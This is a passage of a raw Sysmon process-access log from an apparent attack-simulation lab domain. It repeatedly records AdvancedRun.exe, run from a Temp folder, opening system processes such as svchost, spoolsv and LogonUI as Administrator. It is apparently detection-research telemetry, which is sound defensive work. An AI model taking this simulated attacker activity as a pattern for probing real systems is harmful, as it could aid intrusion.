edRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2600-000000002402}2820C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2500-000000002402}2748C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB9-61E7-2300-000000002402}2592C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2200-000000002402}2520C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2100-000000002402}2512C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB1-61E7-1F00-000000002402}2104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1700-000000002402}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1600-000000002402}1292C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1500-000000002402}1240C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1400-000000002402}1084C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1200-000000002402}400C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1100-000000002402}416C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1000-000000002402}436C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000002968240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0F00-000000002402}304C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0E00-000000002402}996C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0D00-000000002402}900C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Us